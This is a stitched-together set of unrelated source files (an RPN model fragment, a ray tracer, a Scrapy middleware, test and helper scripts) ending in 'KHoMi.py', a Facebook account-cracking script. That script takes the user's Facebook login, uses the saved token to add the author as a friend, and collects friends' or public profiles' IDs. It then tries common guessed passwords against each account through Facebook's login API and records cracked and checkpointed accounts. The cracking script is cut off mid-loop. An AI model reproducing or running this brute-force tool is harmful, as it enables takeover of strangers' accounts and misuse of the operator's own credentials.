train_cnns=True,
train_rpn=True,
loss_lamda=10,
is_build=True,
input_shape=(None, conf.IMAGE_HEIGHT, conf.IMAGE_WEIGHT, 3),
**kwargs):
'''
@param cnns: 卷积层模型直接赋值,用于已经完成的模型继续训练,与cnns_name二选一,该参数优先
@param cnns_name: 使用哪个cnns网络(resnet34 | resnet50)
@param rpn: 训练好的rpn层,用于继续训练
@param scaling: 特征图缩放比例
@param train_cnns: cnns层是否参与训练
@param train_rpn: rpn层是否参与训练
'''
self.__scaling = scaling
self.__K = K
self.__cnns_base_channel_num = cnns_base_channel_num
self.__cnns_name = cnns_name
self.cnns = cnns
self.rpn = rpn
self.__train_cnns = train_cnns
self.__train_rpn = train_rpn
self.__loss_lamda = loss_lamda
super(RPNModel, self).__init__(name='rpn', learning_rate=learning_rate, **kwargs)
if (is_build):
self._net.build(input_shape=input_shape)
pass
pass
# 设置cnns层是否参与运算
def set_cnns_trainable(self, training):
self.cnns.trainable = training
pass
# 设置rpn层是否参与运算
def set_rpn_trainable(self, training):
self.rpn.trainable = training
pass
# 优化器
def optimizer(self, net, learning_rate=0.9):
return tf.optimizers.Adam(learning_rate=learning_rate)
# 损失函数
def loss(self):
return RPNLoss(loss_lamda=self.__loss_lamda)
# 评价函数
def metrics(self):
return [RPNMetricCls(), RPNMetricReg()]
# 模型名称
def model_name(self):
return self.name + "_" + self.__cnns_name
# 装配模型
def assembling(self, net):
# 选择CNNsNet
if (self.cnns is None):
# 如果是resnet34
if (self.__cnns_name == 'resnet34'):
self.cnns = ResNet34(training=self.__train_cnns, scaling=self.__scaling, base_channel_num=self.__cnns_base_channel_num)
pass
# 默认resnet50
else:
self.cnns = ResNet50(training=self.__train_cnns, scaling=self.__scaling, base_channel_num=self.__cnns_base_channel_num)
pass
pass
# 创建RPNNet
if (self.rpn is None):
self.rpn = RPNNet(training=self.__train_rpn, input_shape=self.cnns.get_output_shape(), K=self.__K, loss_lamda=self.__loss_lamda)
pass
# 装配模型
net.add(self.cnns)
net.add(self.rpn)
pass
# 测试
def test(self, X, batch_size=2):
'''测试
@param X: 测试数据(num, h, w, 3)
@param batch_size: 批量
@return: 特征图(num, h, w, 6, K)
'''
fmaps = self._net.predict(X, batch_size=batch_size)
return fmaps
# 统计分类数据
def test_cls(self, fmaps, ymaps):
'''统计分类数据
@param fmaps: Tensor(num, h, w, 6, K) test函数返回的特征图
@param ymaps: Numpy(num, h, w, 6, K) 与fmaps对应的标签特征图
@return: TP, TN, FP, TN, P, N
'''
y_true = tf.convert_to_tensor(ymaps, dtype=tf.float32)
y_pred = tf.convert_to_tensor(fmaps, dtype=tf.float32)
anchors = takeout_sample_array(y_true, y_pred)
return RPNMetricCls().tp_tn_fp_tf_p_n(anchors)
# 计算回归的平均绝对误差
def test_reg(self, fmaps, ymaps):
'''计算回归的平均绝对误差
@param fmaps: numpy (batch_size, h, w, 6, K) test函数返回的特征图
@param ymaps: numpy (batch_size, num, 10) 与fmaps对应的标签特征图
@return: MAE
'''
y_true = tf.convert_to_tensor(ymaps, dtype=tf.float32)
y_pred = tf.convert_to_tensor(fmaps, dtype=tf.float32)
anchors = takeout_sample_array(y_true, y_pred)
return RPNMetricReg().mean_abs_error(y_true, anchors)
# 生成全部建议框
def candidate_box_from_fmap(self,
fmaps,
threshold_prob=conf.RPN.get_nms_threshold_positives(),
threshold_iou=conf.RPN.get_nms_threshold_iou(),
K=conf.ROIS.get_K(),
roi_areas = conf.ROIS.get_roi_areas(),
roi_scales = conf.ROIS.get_roi_scales()):
'''根据模型输出的fmaps生成全部候选框(所有被判定为前景的anchor,过nms)
@param fmaps: numpy(num, h, w, 6, K)
@param threshold_prob: 判定为前景的阈值
@param threshold_iou: NMS中用到的IoU阈值。超过此阈值的anchor会被判定为重叠的anchor过滤掉
@param K: 特征图中每个像素点对应多少个anchor(roi_areas * roi_scales的组合)
@param roi_areas: anchor面积比划分(1:1时的长宽值)
@param roi_scales: anchor长宽比划分
@return: [numpy(num, 6)...]
[正样本概率, xl,yl(左上点), xr,yr(右下点), 区域面积]
'''
# 取fmaps中生成的所有被判定为前景的anchor
anchors = all_positives_from_fmaps(fmaps, threshold=threshold_prob, K=K, roi_areas=roi_areas, roi_scales=roi_scales)
return nms(anchors, threshold=threshold_iou)
pass
| [
"irenebritney@192.168.31.84"
] | irenebritney@192.168.31.84 |
3f7f0533a77371bd9afca6f9b3db560d4bd1bbc5 | ff6a258429d73f3536528decaf595ab749b17084 | /tools/ray.py | e9a5b54fc8416a899c144e0b623e812095452459 | [] | no_license | xavihart/CG-RayTracer | 1a3051317f868332e6213eed560d41f1c6619c4c | 29218a32ae0436d23a238bfe70f00727f91a7799 | refs/heads/master | 2022-12-10T03:12:23.256644 | 2020-09-15T15:40:00 | 2020-09-15T15:40:00 | 273,280,718 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 609 | py | from .vec3 import *
class ray:
def __init__(self, a_=vec3(0, 0, 0), b_=vec3(0, 0, 0), t_=0):
# note : a_ and b_ must be vec3
self.a = a_
self.b = b_
self.t = t_
def origin(self):
return self.a
def direction(self):
return self.b
def point_at_parameter(self, t):
return self.a + self.b.mul(t)
def time(self):
return self.t
if __name__ == "__main__":
a = vec3(1,2,3)
b = vec3(1,1,1)
r = ray(a, b)
c = r.point_at_parameter(2)
c.show()
c = r.point_at_parameter(3)
c.show()
| [
"xavihart@sjtu.edu.cn"
] | xavihart@sjtu.edu.cn |
a8691c22467753872cc6ea65d244c12c491dc815 | 9743d5fd24822f79c156ad112229e25adb9ed6f6 | /xai/brain/wordbase/nouns/_nationality.py | 4e1dcbd9aa26fd3af3fbdc1264cb9f070b10fdb7 | [
"MIT"
] | permissive | cash2one/xai | de7adad1758f50dd6786bf0111e71a903f039b64 | e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6 | refs/heads/master | 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 413 | py |
#calss header
class _NATIONALITY():
def __init__(self,):
self.name = "NATIONALITY"
self.definitions = [u'the official right to belong to a particular country: ', u'a group of people of the same race, religion, traditions, etc.: ']
self.parents = []
self.childen = []
self.properties = []
self.jsondata = {}
self.specie = 'nouns'
def run(self, obj1 = [], obj2 = []):
return self.jsondata
| [
"xingwang1991@gmail.com"
] | xingwang1991@gmail.com |
2fe768dff1923ab14087efa6799cddc20e67ef62 | 0f662b816ef6c54e557a4ef19c16a7ed15e96ad1 | /attention/helpers.py | 7d6db7d3183b810b444a56d9dfed92e1ac7f7406 | [] | no_license | xiaowodaweiwang/practical-ml | c23781dcf3420adc1ffe07b14e8deb05e5d94150 | 1297ccb7f1220f2e7205575dd50ce372c6e018d8 | refs/heads/master | 2022-12-26T06:27:40.705938 | 2020-05-21T01:02:32 | 2020-05-21T01:02:32 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,547 | py | import cv2
import tensorflow as tf
from tensorflow import keras
import numpy as np
K = keras.backend
Model = keras.models.Model
def overlay_attn(model, x, img_path, filepath='./attention/attn.jpg'):
# https://github.com/Vadikus/practicalDL/blob/master/01%20-%2005%20-%20Attention%20of%20ConvNet%20(VGG16).ipynb
last_vgg_conv_layer = model.get_layer('block5_conv3')
heatmap_model = Model([model.inputs], [last_vgg_conv_layer.output, model.output])
# Get gradient of the winner class w.r.t. the output of the (last) conv. layer
# https://stackoverflow.com/questions/58322147/how-to-generate-cnn-heatmaps-using-built-in-keras-in-tf2-0-tf-keras
with tf.GradientTape() as gtape:
conv_output, predictions = heatmap_model(x)
loss = predictions[:, K.argmax(predictions[0])]
grads = gtape.gradient(loss, conv_output)
pooled_grads = K.mean(grads, axis=(0, 1, 2))
heatmap = tf.reduce_mean(tf.multiply(pooled_grads, conv_output), axis=-1)
heatmap = K.maximum(heatmap, 0)
max_heat = K.max(heatmap)
if max_heat == 0:
max_heat = 1e-10
heatmap /= max_heat
heatmap = tf.reshape(heatmap, shape=(heatmap.shape[1], heatmap.shape[2], 1))
heatmap = heatmap.numpy()
img = cv2.imread(img_path)
img_shape = (img.shape[1], img.shape[0])
heatmap = cv2.resize(heatmap, img_shape)
heatmap = np.uint8(255 * heatmap)
heatmap = cv2.applyColorMap(heatmap, cv2.COLORMAP_JET)
superimposed_img = heatmap * 0.4 + img
cv2.imwrite(filepath, superimposed_img)
| [
"larryschirmer@gmail.com"
] | larryschirmer@gmail.com |
6178613ae1de09e96e249662e9fbc8df8c9503f8 | 7353050d53f6b3fbb0561a719908bef630143ff6 | /telBot_env/bin/easy_install | 4d7fb214fedc93b87d6fbec4f89e17c42a344ac0 | [] | no_license | GoldenRed/telBot | 5754b6314c2774d8575d07ffec1d3dbb8d3c1699 | a2b0b884bb8a849ddcfb8c62a79aa464ffc881af | refs/heads/master | 2022-12-13T18:14:46.461823 | 2021-04-05T06:54:11 | 2021-04-05T06:54:11 | 211,549,491 | 0 | 0 | null | 2022-12-08T06:39:58 | 2019-09-28T19:09:57 | Python | UTF-8 | Python | false | false | 271 | #!/mnt/c/Users/dbz00/Sync/telBot/telBot_env/bin/python3
# -*- coding: utf-8 -*-
import re
import sys
from setuptools.command.easy_install import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(main())
| [
"yared94@gmail.com"
] | yared94@gmail.com | |
8da1f2b67b46206e3835fdfee41f7365ac844f46 | 577f03954ec69ed82eaea32c62c8eba9ba6a01c1 | /py/testdir_ec2_only/test_parse_covtype20x_s3.py | d6207e11b1f8763b5cd9fdd1466e72b472d7c03f | [
"Apache-2.0"
] | permissive | ledell/h2o | 21032d784a1a4bb3fe8b67c9299f49c25da8146e | 34e271760b70fe6f384e106d84f18c7f0adb8210 | refs/heads/master | 2020-02-26T13:53:01.395087 | 2014-12-29T04:14:29 | 2014-12-29T04:14:29 | 24,823,632 | 1 | 2 | null | null | null | null | UTF-8 | Python | false | false | 1,962 | py | import unittest, sys, random, time
sys.path.extend(['.','..','../..','py'])
import h2o, h2o_cmd, h2o_browse as h2b, h2o_import as h2i
class Basic(unittest.TestCase):
def tearDown(self):
h2o.check_sandbox_for_errors()
@classmethod
def setUpClass(cls):
print "Will build clouds with incrementing heap sizes and import folder/parse"
@classmethod
def tearDownClass(cls):
# the node state is gone when we tear down the cloud, so pass the ignore here also.
h2o.tear_down_cloud(sandboxIgnoreErrors=True)
def test_parse_covtype20x_loop_s3(self):
bucket = 'home-0xdiag-datasets'
importFolderPath = "standard"
csvFilename = "covtype20x.data"
csvPathname = importFolderPath + "/" + csvFilename
timeoutSecs = 500
trialMax = 3
for tryHeap in [4,12]:
print "\n", tryHeap,"GB heap, 1 jvm per host, import folder,", \
"then parse 'covtype20x.data'"
h2o.init(java_heap_GB=tryHeap)
# don't raise exception if we find something bad in h2o stdout/stderr?
h2o.nodes[0].sandboxIgnoreErrors = True
for trial in range(trialMax):
hex_key = csvFilename + ".hex"
start = time.time()
parseResult = h2i.import_parse(bucket=bucket, path=csvPathname, schema='s3', hex_key=hex_key,
timeoutSecs=timeoutSecs, retryDelaySecs=10, pollTimeoutSecs=60)
elapsed = time.time() - start
print "parse result:", parseResult['destination_key']
print "Trial #", trial, "completed in", elapsed, "seconds.", \
"%d pct. of timeout" % ((elapsed*100)/timeoutSecs)
removeKeyResult = h2o.nodes[0].remove_key(key=hex_key)
h2o.tear_down_cloud()
# sticky ports? wait a bit.
time.sleep(5)
if __name__ == '__main__':
h2o.unit_main()
| [
"kevin@0xdata.com"
] | kevin@0xdata.com |
788ecb8dfd993ef9d68c1c979145bef4be44c7a1 | 516dea668ccdc13397fd140f9474939fa2d7ac10 | /enterprisebanking/middlewares.py | ad1d6a91a6ff2f6a7afebb8c4d5c122ae4ea0f71 | [] | no_license | daniel-kanchev/enterprisebanking | 08f1162647a0820aafa5a939e64c1cceb7844977 | bdb7bc4676419d7dcfe47ca8e817774ad031b585 | refs/heads/main | 2023-04-09T19:29:30.892047 | 2021-04-07T08:10:15 | 2021-04-07T08:10:15 | 355,463,635 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,670 | py | # Define here the models for your spider middleware
#
# See documentation in:
# https://docs.scrapy.org/en/latest/topics/spider-middleware.html
from scrapy import signals
# useful for handling different item types with a single interface
from itemadapter import is_item, ItemAdapter
class enterprisebankingSpiderMiddleware:
# Not all methods need to be defined. If a method is not defined,
# scrapy acts as if the spider middleware does not modify the
# passed objects.
@classmethod
def from_crawler(cls, crawler):
# This method is used by Scrapy to create your spiders.
s = cls()
crawler.signals.connect(s.spider_opened, signal=signals.spider_opened)
return s
def process_spider_input(self, response, spider):
# Called for each response that goes through the spider
# middleware and into the spider.
# Should return None or raise an exception.
return None
def process_spider_output(self, response, result, spider):
# Called with the results returned from the Spider, after
# it has processed the response.
# Must return an iterable of Request, or item objects.
for i in result:
yield i
def process_spider_exception(self, response, exception, spider):
# Called when a spider or process_spider_input() method
# (from other spider middleware) raises an exception.
# Should return either None or an iterable of Request or item objects.
pass
def process_start_requests(self, start_requests, spider):
# Called with the start requests of the spider, and works
# similarly to the process_spider_output() method, except
# that it doesn’t have a response associated.
# Must return only requests (not items).
for r in start_requests:
yield r
def spider_opened(self, spider):
spider.logger.info('Spider opened: %s' % spider.name)
class enterprisebankingDownloaderMiddleware:
# Not all methods need to be defined. If a method is not defined,
# scrapy acts as if the downloader middleware does not modify the
# passed objects.
@classmethod
def from_crawler(cls, crawler):
# This method is used by Scrapy to create your spiders.
s = cls()
crawler.signals.connect(s.spider_opened, signal=signals.spider_opened)
return s
def process_request(self, request, spider):
# Called for each request that goes through the downloader
# middleware.
# Must either:
# - return None: continue processing this request
# - or return a Response object
# - or return a Request object
# - or raise IgnoreRequest: process_exception() methods of
# installed downloader middleware will be called
return None
def process_response(self, request, response, spider):
# Called with the response returned from the downloader.
# Must either;
# - return a Response object
# - return a Request object
# - or raise IgnoreRequest
return response
def process_exception(self, request, exception, spider):
# Called when a download handler or a process_request()
# (from other downloader middleware) raises an exception.
# Must either:
# - return None: continue processing this exception
# - return a Response object: stops process_exception() chain
# - return a Request object: stops process_exception() chain
pass
def spider_opened(self, spider):
spider.logger.info('Spider opened: %s' % spider.name)
| [
"daniel.kanchev@adata.pro"
] | daniel.kanchev@adata.pro |
80dfa387b904d7af2b4712b81c72688f68323e6c | 88819d977f39410eb55b58d6e9752e13d2562232 | /catkin-ws/build/rrbot_control/catkin_generated/pkg.installspace.context.pc.py | 327335c2ca359a670965033714ac99a77413dee2 | [] | no_license | sutkarsh-s/controls | 7b55b5399344cbdc6c8c7a46273ea70bc9e49140 | 4d16b10f72ea356e12d7c3b5db64663107b0dc61 | refs/heads/master | 2022-11-18T01:48:29.287126 | 2020-06-12T15:20:18 | 2020-06-12T15:20:18 | 264,671,662 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 378 | py | # generated from catkin/cmake/template/pkg.context.pc.in
CATKIN_PACKAGE_PREFIX = ""
PROJECT_PKG_CONFIG_INCLUDE_DIRS = "".split(';') if "" != "" else []
PROJECT_CATKIN_DEPENDS = "".replace(';', ' ')
PKG_CONFIG_LIBRARIES_WITH_PREFIX = "".split(';') if "" != "" else []
PROJECT_NAME = "rrbot_control"
PROJECT_SPACE_DIR = "/home/utkarsh/catkin-ws/install"
PROJECT_VERSION = "0.0.0"
| [
"aarushsingh3006@gmail.com"
] | aarushsingh3006@gmail.com |
b896bde0dd58631301979a4950418280891ea378 | 6d3e3fdeba418e5ba488d8bdb7069f360cf62792 | /KHoMi.py | 30600b6bd9626ec4ae5dd7dcacb33863beb675d5 | [] | no_license | Cipher312365/khomi | a758ca34c0fb45f4fa99d8b43686cc5cd0929748 | bb82b53507d12025adf454d01f6e258cf17e01a7 | refs/heads/master | 2022-12-08T16:24:37.515413 | 2020-09-13T13:50:54 | 2020-09-13T13:50:54 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 19,822 | py | #!/usr/bin/python2
#coding=utf-8
import os,sys,time,datetime,random,hashlib,re,threading,json,urllib,cookielib,requests,mechanize
from multiprocessing.pool import ThreadPool
from requests.exceptions import ConnectionError
from mechanize import Browser
reload(sys)
sys.setdefaultencoding('utf8')
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(),max_time=1)
br.addheaders = [('User-Agent', 'Opera/9.80 (Android; Opera Mini/32.0.2254/85. U; id) Presto/2.12.423 Version/12.16')]
def keluar():
print "\033[1;96m[!] \x1b[1;91mExit"
os.sys.exit()
def acak(b):
w = 'ahtdzjc'
d = ''
for i in x:
d += '!'+w[random.randint(0,len(w)-1)]+i
return cetak(d)
def cetak(b):
w = 'ahtdzjc'
for i in w:
j = w.index(i)
x= x.replace('!%s'%i,'\033[%s;1m'%str(31+j))
x += '\033[0m'
x = x.replace('!0','\033[0m')
sys.stdout.write(x+'\n')
def jalan(z):
for e in z + '\n':
sys.stdout.write(e)
sys.stdout.flush()
time.sleep(00000.1)
##### LOGO #####
logo = """ ▄︻┻═┳一 ЩєLc๏Mє ┼๏ ┼ђє Fąş┼єş┼ єVєr cL๏ЙIЙG
▄︻┻═┳一 ♥️KHoMi Rajput-๏FFIcIąL♥️----------🔴
▄︻┻═┳一 ♥️♥️ KHoMi - HaCkER ♥️♥️----🔴🔴
▄︻┻═┳一 💪💪DESI-BACHA💪💪 🔴🔴
▄︻┻═┳一 ---- FєєL ┼ђє P๏Щєr --------🔴🔴
ЩєLc๏Mє ┼๏ ЦЙLIMI┼єđ cL๏ЙIЙG
.-'''-.
' _ \
. . / /` '. \ __ __ ___ .--.
.'| .'| . | \ ' | |/ `.' `. |__|
.' | < | | ' | '| .-. .-. '.--.
< | | | \ \ / / | | | | | || |
| | ____ | | .'''-.`. ` ..' / | | | | | || |
| | \ .' | |/.'''. \ '-...-'` | | | | | || |
| |/ . | / | | | | | | | || |
| /\ \ | | | | |__| |__| |__||__|
| | \ \ | | | |
' \ \ \ | '. | '.
'------' '---''---' '---'
WhatsApp: 03478239915
KHoMi
▇◤▔▔▔▔▔▔▔◥▇
▇▏◥▇◣┊◢▇◤▕▇
▇▏▃▆▅▎▅▆▃▕▇
▇▏╱▔▕▎▔▔╲▕▇
▇◣◣▃▅▎▅▃◢◢▇
▇▇◣◥▅▅▅◤◢▇▇
▇▇▇◣╲▇╱◢▇▇▇
▇▇▇▇◣▇◢▇▇▇▇
ђ๏Pє Y๏Ц MąY Gє┼ ๏Ц┼ЙЦMßєrєđ ącc๏ЦЙ┼ş
P๏şşIßLY şYЙcђr๏ЙI乙єđ ßY ┼ђIş GI┼ђЦß .
♥️♥️♥️ ßєş┼ ๏F LЦcK ♥️♥️♥️
♥️♥️ rąM乙ąЙ MЦßąrąK ┼๏ єVєrY ß๏đY ♥️♥️
\033[1;91m=======================================
\033[1;96mAuthor \033[1;93m: \033[1;92m KHoMi Rajput
\033[1;96mInstagram \033[1;93m: \033[1: itx_FaHaD_GhaFoR_ka_bhai
\033[1;96mFacebook \033[1;93m: \033[1: komail.khan.3781
\033[1;96mGithub \033[1;93m: \033[1;92mhttps://github.com/khomiabu001/khomi
\033[1;91m======================================="""
def tik():
titik = ['. ','.. ','... ']
for o in titik:
print("\r\033[1;96m[●] \x1b[1;93mSedang masuk \x1b[1;97m"+o),;sys.stdout.flush();time.sleep(1)
back = 0
berhasil = []
cekpoint = []
oks = []
id = []
listgrup = []
vulnot = "\033[31mNot Vuln"
vuln = "\033[32mVuln"
os.system("clear")
print "\033[1;96m ============================================================="
print """\033[1;91m
.-'''-.
' _ \
. . / /` '. \ __ __ ___ .--.
.'| .'| . | \ ' | |/ `.' `. |__|
.' | < | | ' | '| .-. .-. '.--.
< | | | \ \ / / | | | | | || |
| | ____ | | .'''-.`. ` ..' / | | | | | || |
| | \ .' | |/.'''. \ '-...-'` | | | | | || |
| |/ . | / | | | | | | | || |
| /\ \ | | | | |__| |__| |__||__|
| | \ \ | | | |
' \ \ \ | '. | '.
'------' '---''---' '---'
KHoMi
▇◤▔▔▔▔▔▔▔◥▇
▇▏◥▇◣┊◢▇◤▕▇
▇▏▃▆▅▎▅▆▃▕▇
▇▏╱▔▕▎▔▔╲▕▇
▇◣◣▃▅▎▅▃◢◢▇
▇▇◣◥▅▅▅◤◢▇▇
▇▇▇◣╲▇╱◢▇▇▇
▇▇▇▇◣▇◢▇▇▇▇
WhatsApp : 03478239915
\033[1;96mAuthor \033[1;93m: \033[1;92m KHoMi Rajput
\033[1;96mInstagram \033[1;93m: \033[1;92mitx_FaHaD_GhaFoR_ka_bhai
\033[1;96mFacebook \033[1;93m: \033[1;92m KHomi Rajput
\033[1;96mGithub \033[1;93m: \033[1;92mhttps://github.com/khomiabu001/khomi
\033[1;91m======================================="""
print " \x1b[1;93m============================================================="
CorrectUsername = "khomirajput"
CorrectPassword = "iamking"
loop = 'true'
while (loop == 'true'):
username = raw_input("\033[1;96m[☆] \x1b[1;93mUsername Of Tool \x1b[1;96m>>>> ")
if (username == CorrectUsername):
password = raw_input("\033[1;96m[☆] \x1b[1;93mPassword Of Tool \x1b[1;96m>>>> ")
if (password == CorrectPassword):
print "Logged in successfully as " + username
loop = 'false'
else:
print "Wrong Password"
os.system('xdg-open https://www.youtube.com/channel/UCDJbhYSPToi1-CdzGLEzAIQ ')
else:
print "Wrong Username"
os.system('xdg-open https://www.youtube.com/channel/UCDJbhYSPToi1-CdzGLEzAIQ ')
def login():
os.system('clear')
try:
toket = open('login.txt','r')
menu()
except (KeyError,IOError):
os.system('clear')
print logo
print 42*"\033[1;96m="
print('\033[1;96m[☆] \x1b[1;93mLOGIN WITH FACEBOOK \x1b[1;96m[☆]' )
id = raw_input('\033[1;96m[+] \x1b[1;93mID/Email \x1b[1;91m: \x1b[1;92m')
pwd = raw_input('\033[1;96m[+] \x1b[1;93mPassword \x1b[1;91m: \x1b[1;92m')
tik()
try:
br.open('https://m.facebook.com')
except mechanize.URLError:
print"\n\033[1;96m[!] \x1b[1;91mThere is no internet connection"
keluar()
br._factory.is_html = True
br.select_form(nr=0)
br.form['email'] = id
br.form['pass'] = pwd
br.submit()
url = br.geturl()
if 'save-device' in url:
try:
sig= 'api_key=882a8490361da98702bf97a021ddc14dcredentials_type=passwordemail='+id+'format=JSONgenerate_machine_id=1generate_session_cookies=1locale=en_USmethod=auth.loginpassword='+pwd+'return_ssl_resources=0v=1.062f8ce9f74b12f84c123cc23437a4a32'
data = {"api_key":"882a8490361da98702bf97a021ddc14d","credentials_type":"password","email":id,"format":"JSON", "generate_machine_id":"1","generate_session_cookies":"1","locale":"en_US","method":"auth.login","password":pwd,"return_ssl_resources":"0","v":"1.0"}
x=hashlib.new("md5")
x.update(sig)
a=x.hexdigest()
data.update({'sig':a})
url = "https://api.facebook.com/restserver.php"
r=requests.get(url,params=data)
z=json.loads(r.text)
unikers = open("login.txt", 'w')
unikers.write(z['access_token'])
unikers.close()
print '\n\033[1;96m[✓] \x1b[1;92mLogin Successful'
os.system('xdg-open https://www.Facebook.com/komail.khan.3781')
requests.post('https://graph.facebook.com/me/friends?method=post&uids=gwimusa3&access_token='+z['access_token'])
menu()
except requests.exceptions.ConnectionError:
print"\n\033[1;96m[!] \x1b[1;91mThere is no internet connection"
keluar()
if 'checkpoint' in url:
print("\n\033[1;96m[!] \x1b[1;91mIt seems that your account has a checkpoint")
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
else:
print("\n\033[1;96m[!] \x1b[1;91mPassword/Email is wrong")
os.system('rm -rf login.txt')
time.sleep(1)
login()
def menu():
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
os.system('clear')
print"\033[1;96m[!] \x1b[1;91mToken invalid"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
otw = requests.get('https://graph.facebook.com/me?access_token='+toket)
a = json.loads(otw.text)
nama = a['name']
id = a['id']
except KeyError:
os.system('clear')
print"\033[1;96m[!] \033[1;91mIt seems that your account has a checkpoint"
os.system('rm -rf login.txt')
time.sleep(1)
login()
except requests.exceptions.ConnectionError:
print"\033[1;96m[!] \x1b[1;91mThere is no internet connection"
keluar()
os.system("clear")
print logo
print 42*"\033[1;96m="
print "\033[1;96m[\033[1;97m✓\033[1;96m]\033[1;93m Name \033[1;91m: \033[1;92m"+nama+"\033[1;97m "
print "\033[1;96m[\033[1;97m✓\033[1;96m]\033[1;93m ID \033[1;91m: \033[1;92m"+id+"\x1b[1;97m "
print 42*"\033[1;96m="
print "\x1b[1;96m[\x1b[1;92m1\x1b[1;96m]\x1b[1;93m Start Hacking"
print "\x1b[1;96m[\x1b[1;91m0\x1b[1;96m]\x1b[1;91m Exit "
pilih()
def pilih():
unikers = raw_input("\n\033[1;97m >>> \033[1;97m")
if unikers =="":
print "\033[1;96m[!] \x1b[1;91mFill in correctly"
pilih()
elif unikers =="1":
super()
elif unikers =="0":
jalan('Token Removed')
os.system('rm -rf login.txt')
keluar()
else:
print "\033[1;96m[!] \x1b[1;91mFill in correctly"
pilih()
def super():
global toket
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;96m[!] \x1b[1;91mToken invalid"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 42*"\033[1;96m="
print "\x1b[1;96m[\x1b[1;92m1\x1b[1;96m]\x1b[1;93m Crack From Friend List"
print "\x1b[1;96m[\x1b[1;92m2\x1b[1;96m]\x1b[1;93m Crack From Any Public ID"
print "\x1b[1;96m[\x1b[1;92m3\x1b[1;96m]\x1b[1;93m Crack From File"
print "\x1b[1;96m[\x1b[1;91m0\x1b[1;96m]\x1b[1;91m Back"
pilih_super()
def pilih_super():
peak = raw_input("\n\033[1;97m >>> \033[1;97m")
if peak =="":
print "\033[1;96m[!] \x1b[1;91mFill in correctly"
pilih_super()
elif peak =="1":
os.system('clear')
print logo
print 42*"\033[1;96m="
jalan('\033[1;96m[✺] \033[1;93mGetting ID \033[1;97m...')
r = requests.get("https://graph.facebook.com/me/friends?access_token="+toket)
z = json.loads(r.text)
for s in z['data']:
id.append(s['id'])
elif peak =="2":
os.system('clear')
print logo
print 42*"\033[1;96m="
idt = raw_input("\033[1;96m[+] \033[1;93mEnter ID \033[1;91m: \033[1;97m")
try:
jok = requests.get("https://graph.facebook.com/"+idt+"?access_token="+toket)
op = json.loads(jok.text)
print"\033[1;96m[\033[1;97m✓\033[1;96m] \033[1;93mName\033[1;91m :\033[1;97m "+op["name"]
except KeyError:
print"\033[1;96m[!] \x1b[1;91mID Not Found!"
raw_input("\n\033[1;96m[\033[1;97mBack\033[1;96m]")
super()
jalan('\033[1;96m[✺] \033[1;93mGetting IDs \033[1;97m...')
r = requests.get("https://graph.facebook.com/"+idt+"/friends?access_token="+toket)
z = json.loads(r.text)
for i in z['data']:
id.append(i['id'])
elif peak =="3":
os.system('clear')
print logo
print 42*"\033[1;96m="
try:
idlist = raw_input('\x1b[1;96m[+] \x1b[1;93mEnter File Path \x1b[1;91m: \x1b[1;97m')
for line in open(idlist,'r').readlines():
id.append(line.strip())
except IOError:
print '\x1b[1;96m[!] \x1b[1;91mFile Not Found'
raw_input('\n\x1b[1;96m[ \x1b[1;97mBack \x1b[1;96m]')
super()
elif peak =="0":
menu()
else:
print "\033[1;96m[!] \x1b[1;91mFill in correctly"
pilih_super()
print "\033[1;96m[+] \033[1;93mTotal IDs \033[1;91m: \033[1;97m"+str(len(id))
jalan('\033[1;96m[✺] \033[1;93mStarting \033[1;97m...')
titik = ['. ','.. ','... ']
for o in titik:
print("\r\033[1;96m[\033[1;97m✸\033[1;96m] \033[1;93mCracking \033[1;97m"+o),;sys.stdout.flush();time.sleep(1)
print
print('\x1b[1;96m[!] \x1b[1;93mTo Stop Process Press CTRL Then Press z')
print 42*"\033[1;96m="
def main(arg):
global cekpoint,oks
user = arg
try:
os.mkdir('out')
except OSError:
pass
try:
a = requests.get('https://graph.facebook.com/'+user+'/?access_token='+toket)
b = json.loads(a.text)
pass1 = ('786786')
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass1)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[\x1b[1;92mSuccessful\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass1
oks.append(user+pass1)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[\x1b[1;93mCheckpoint\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass1
cek = open("out/checkpoint.txt", "a")
cek.write(user+"|"+pass1+"\n")
cek.close()
cekpoint.append(user+pass1)
else:
pass2 = b['first_name']+'12345'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass2)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[\x1b[1;92mSuccessful\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass2
oks.append(user+pass2)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[\x1b[1;93mCheckpoint\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass2
cek = open("out/checkpoint.txt", "a")
cek.write(user+"|"+pass2+"\n")
